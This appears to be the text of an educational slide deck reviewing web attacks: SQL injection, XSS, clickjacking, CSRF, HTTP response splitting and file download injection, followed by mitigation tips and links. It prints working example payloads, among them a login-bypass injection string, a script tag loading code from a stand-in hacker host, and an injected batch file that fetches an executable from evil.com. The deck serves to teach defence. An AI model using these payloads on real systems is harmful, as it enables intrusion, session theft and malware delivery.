Trendy Web Security
A Review of times past
SQL Injection
password ' OR 1=1; --
Parses as: SELECT username FROM users WHERE username = 'username' and password = '' OR 1=1
And you're in...
Cross Site Scripting (XSS)
About-Me field I enjoy long walks on the beach, and <script src="http://my-hacks.com/owned.js">
Now, you have your code running in another guy's browser
Have your code change his linksys' DNS settings?
SQL Injections and XSS attacks are old news.
What's new(er)?
Click Jacking
A Demo...
No JS Needed!
Cross Site Request Forgery
You are now logged out of google.
Or... had your domain stolen
• CSRF Creates a new Gmail Filter which forwards certain emails
• Hacker sends an email forwarded to your host, asking for a transfer + unlock
• Hacker transfers your domain away.
HTTP Response Splitting
/redir_lang.jsp?lang=English /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/ 1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d %0aShazam
HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: http://10.1.1.1/by_lang.jsp?lang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 Shazam Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with Content-Type: text/html Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us S!-1251019693; path=/ Connection: Close
302 Moved Temporarily This document you requested has moved temporarily.
It's now at http://10.1.1.1/by_lang.jsp?l ang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 <html>Shazam</html>.
Why? • Cache Poisoning • Replace content • Phishing • XSS • etc.
File Download Injection
An similar idea to response splitting
We've all written download scripts: download.php?file=report.xls
$filename = basename($_GET["download"]); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile(basename($_GET["download"])); return;
http://[trusted_domain]/download.php?file=attack.bat%0d %0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A %20evil.com%0d%0awzinet95.exe
HTTP/1.1 200 OK Date: Thu, 27 Mar 2008 05:02:24 GMT Server: Apache Path=/download Content-Disposition: attachment;filename=attack.bat Content-length: 88 echo get /pub/winzip/wzinet95.exe|ftp -A evil.com awzinet95.exe Content-Length: 0 Content-Type: application/octet-stream;charset=euc-kr
It's a dangerous world...
How about some Mitigation
As a user Sensitive stuff in separate browser?
As a programmer: Whitelist everything. Nothing gets through w/o you knowing
As a programmer: GET vs. POST. Use them correctly.
Download Injection: Use the real file name, and not the http argument
ClickJacking NoScript has a "Forbid iframe" feature
Links •
http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss
•
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
•
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
•
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
•
http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
•
http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
•
http://www.breakingpointsystems.com/community/blog/clickjacking
•
http://en.wikipedia.org/wiki/Cross-site_request_forgery
•
http://www.davidairey.com/google-gmail-security-hijack/
•
http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html